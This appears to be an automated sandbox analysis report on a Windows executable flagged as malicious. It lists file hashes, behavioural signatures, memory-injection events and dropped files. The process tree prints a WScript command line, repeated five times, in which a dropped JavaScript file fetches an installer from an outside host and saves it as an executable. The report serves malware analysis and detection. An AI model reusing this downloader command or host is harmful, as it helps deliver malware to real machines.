ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e

Analysis

max time kernel
141s
max time network
153s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
28-11-2022 05:50

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe
Size

184KB
MD5

78dbce0a666c509a604fe15b95e7ca9c
SHA1

f871b9f413430b05d8e0e36768d9b8cdd74dde22
SHA256

ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e
SHA512

a7e38855bd65abbfcf3d34d35da12a11f2029d91ca71135621ef2b9782b8703a0021376ad8c4a3d103fc6300c7b210c7a15e5c378982036b672b90605cda952d
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3Q:/7BSH8zUB+nGESaaRvoB7FJNndnd

Score

8^/10

Malware Config

Signatures

Blocklisted process makes network request 18 IoCs

flow	pid	Process
2	2000	WScript.exe
5	2000	WScript.exe
6	364	WScript.exe
8	364	WScript.exe
11	364	WScript.exe
13	364	WScript.exe
15	364	WScript.exe
16	1904	WScript.exe
18	1904	WScript.exe
22	1904	WScript.exe
23	1904	WScript.exe
25	1904	WScript.exe
26	1088	WScript.exe
28	1088	WScript.exe
30	1088	WScript.exe
31	1088	WScript.exe
32	112	WScript.exe
34	112	WScript.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Script User-Agent 5 IoCs

Uses user-agent string associated with script host/environment.

description	flow	ioc
HTTP User-Agent header	2	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	6	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	16	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	26	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	32	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 1960 wrote to memory of 2000	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	26
PID 1960 wrote to memory of 2000	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	26
PID 1960 wrote to memory of 2000	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	26
PID 1960 wrote to memory of 2000	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	26
PID 1960 wrote to memory of 364	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	29
PID 1960 wrote to memory of 364	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	29
PID 1960 wrote to memory of 364	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	29
PID 1960 wrote to memory of 364	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	29
PID 1960 wrote to memory of 1904	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	31
PID 1960 wrote to memory of 1904	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	31
PID 1960 wrote to memory of 1904	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	31
PID 1960 wrote to memory of 1904	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	31
PID 1960 wrote to memory of 1088	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	33
PID 1960 wrote to memory of 1088	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	33
PID 1960 wrote to memory of 1088	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	33
PID 1960 wrote to memory of 1088	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	33
PID 1960 wrote to memory of 112	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	35
PID 1960 wrote to memory of 112	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	35
PID 1960 wrote to memory of 112	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	35
PID 1960 wrote to memory of 112	1960	ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe	35

C:\Users\Admin\AppData\Local\Temp\ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe
"C:\Users\Admin\AppData\Local\Temp\ad1604fa3feddd2ad788ae98f29f9d9a3a7bde248bd5fd4af4c8427d7b65985e.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:1960
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6421.js" http://www.djapp.info/?domain=kWGbEuUOHF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf6421.exe
  2⤵
  - Blocklisted process makes network request
  PID:2000
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6421.js" http://www.djapp.info/?domain=kWGbEuUOHF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf6421.exe
  2⤵
  - Blocklisted process makes network request
  PID:364
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6421.js" http://www.djapp.info/?domain=kWGbEuUOHF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf6421.exe
  2⤵
  - Blocklisted process makes network request
  PID:1904
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6421.js" http://www.djapp.info/?domain=kWGbEuUOHF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf6421.exe
  2⤵
  - Blocklisted process makes network request
  PID:1088
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf6421.js" http://www.djapp.info/?domain=kWGbEuUOHF.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=O9BVGtj2a-YEr6Zs3wyYH6qubo4P1YmGmG C:\Users\Admin\AppData\Local\Temp\fuf6421.exe
  2⤵
  - Blocklisted process makes network request
  PID:112

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
1KB

MD5
49e0088d07f2111450eb49fc09d0d5af

SHA1
bc9ac6080bdede0b82956839a50119ccc0dfa814

SHA256
fdf1f917e45da0c06722f174bd2ff3f82ce95587bfb117d296f0e6a64b697198

SHA512
865242e5298ec34105538ec27967111a6845c6f02d6f53789d25133333379e612569d2baeca80d70bbf63f64d9bc1e203c657d2e3761de4a141ded3ac95f86dc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
280B

MD5
dd61fa1508c3d3ce60dca88db9869de3

SHA1
ac2bba408058c2b4efb09c55ea598490c0e48981

SHA256
5e85ea98f2a6ea9083f007fe550758fba0d269a5a8c03e703ea9fbc6494d0368

SHA512
5e5f84450ffa85574396741a4c766ab799867504a1a8e77e717791b383a9e5f9bfb9c97c2ecd2da9558d0d06b3bb287c4e506d9b547b7ab92aed26ed10fa545a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
1KB

MD5
a266bb7dcc38a562631361bbf61dd11b

SHA1
3b1efd3a66ea28b16697394703a72ca340a05bd5

SHA256
df545bf919a2439c36983b54cdfc903dfa4f37d3996d8d84b4c31eec6f3c163e

SHA512
0da8ef4f8f6ed3d16d2bc8eb816b9e6e1345dfe2d91160196c47e6149a1d6aedaafadcefd66acdea7f72dcf0832770192ceac15b0c559c4ccc2c0e5581d5aefc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\6BADA8974A10C4BD62CC921D13E43B18_28DEA62A0AE77228DD387E155AD0BA27

Filesize
438B

MD5
23a4ca0150f76b0da8d9648096466a46

SHA1
db0a82bd55c36169151a66a5f34eb7c6fca9a3c3

SHA256
eca969eb1357c5a303310889fe962d26f547b7f6d71e4e04c72cdd95e6ee744d

SHA512
b21be1ec29a4ffad5c3d471b719d7af65d6b92cdf27008b1b7658ae9308a00874137007d2ac31c6b74d2500aff454c93a41e5ff5a52a777b58822dbf2b3ac9c3

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
340B

MD5
63449b7443377e16349128622c6f457c

SHA1
13d523ba6b548907fc44e5944deedf4ddd152470

SHA256
4fe7e1a06ce550bdf0b14af32679c6a137fd2ef0b9e2c811ba3aa0c1726b95eb

SHA512
d4190cf96cff25363abd6b2c77021efb881fb926187c61aac6efa5a84d992b8917eb634ac3e70bcb80829b7cfbd77e5e7d7255b7dcbea52722dc9cbd19804ebb

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\9FF67FB3141440EED32363089565AE60_C1D494D2F32AEDC4FBA6C14F3F436273

Filesize
426B

MD5
959961d2a8ba6a08702108ab563ea2ab

SHA1
640a75bad91912cfa663482592f55ce4ec11db21

SHA256
1640d2b37e497dd2c1ec4147a5f853d5308d19ade6687ede9d2a9a77fc77118a

SHA512
aa8c534fe9c5255907bdf06c648e89304d64f30e4d4b311b9bb9a3bc49f5543aca8c4f0ce4651c13e6ea12cc92ccee84beb7ac8ae4739f84ad58eaeeed792a64

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F0ACCF77CDCBFF39F6191887F6D2D357

Filesize
242B

MD5
451c9464f130a09bddd9d56085d95a89

SHA1
afb8d0e08275db8de1a9a49221dc499402f6088a

SHA256
c25eee04795ada1452e23bea9beb3d34bd7d36e8293f2a19f9a96809b50a51bb

SHA512
c203ed98be01012a67f9f74586f8c7ff0d3742819e1d9ca8a513dc73b0ae3431a7dc0238b3c4d223ecf604bb594f9cbe51c30f7ce67f7f9db02eda03857db795

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\0LYNQJM7\domain_profile[1].htm

Filesize
7KB

MD5
a29945b57e00b00befd5fbbdadf6b34c

SHA1
703f8b9539356e2e34c833b8fbae497e6b58aca8

SHA256
99f1ff17c80aa92765b1b39f09d75f293a05ac65af00b88682ee3f6db84ae46d

SHA512
01410cfb1fad0ae8502bbe85e4fb3c6d02fe610c1ab050b5b7eaef138d81445337ef7cb997d8bc8cc05f1cbf16b63cb25426466d3fdadc7e539b47db86d0087b

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\MK8YK3QV\domain_profile[1].htm

Filesize
7KB

MD5
9ee33c48066b593cbb086f05aec39f4d

SHA1
4e8d95083304f28824ea6db6d6c8328b46a1b5c3

SHA256
ba17c4536ded3142dfc74955b1049e344d40cd0762caeda6b18ba4281aff5b0b

SHA512
2f6df217645be967becb381c687cbe354bfaddfcdb3016e917fbe1f07fb17cf3c29f8283b4a230e520e69c5c11df4b5f03c28fe2a408fbd595f3e835b3c5251d

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf6421.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\AA5Z5WQ9.txt

Filesize
177B

MD5
66e6097ff1d004905d5701f6c9f44de5

SHA1
d4149395db9a34410d110a242774246acae37dca

SHA256
09ebed98890c212e904bb1244521a0ee546f99b367c76f5da2c8bbf276b0e513

SHA512
55bd95fed68119a1e13a2f871e70e3dee0daaa3cfbfe385f1b159c0035bb2b1baea1cf24578a3c5e18fcbf403afeded1460743069104d9c8e380cfe949176054

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\S56A743H.txt

Filesize
100B

MD5
2d91c7e58f4c4589818035757c92cd66

SHA1
a0861cd1b4c1b30fa8891c5bba1c9de3af7aadad

SHA256
9ff0ac29675a36e1af59b5d3e30bde1946619db57655b403d8ff4bc330cc62ab

SHA512
9d9272d0e35a099acb818c5545251cacece515a6e8557f52396e1e8b5f1879132fbff12a9581cabc40261a63b8c5f26a2ac3f26a8ddcd623ed2cad03c3c72dfe

Download Submit
memory/1960-54-0x0000000075451000-0x0000000075453000-memory.dmp

Filesize
8KB

Download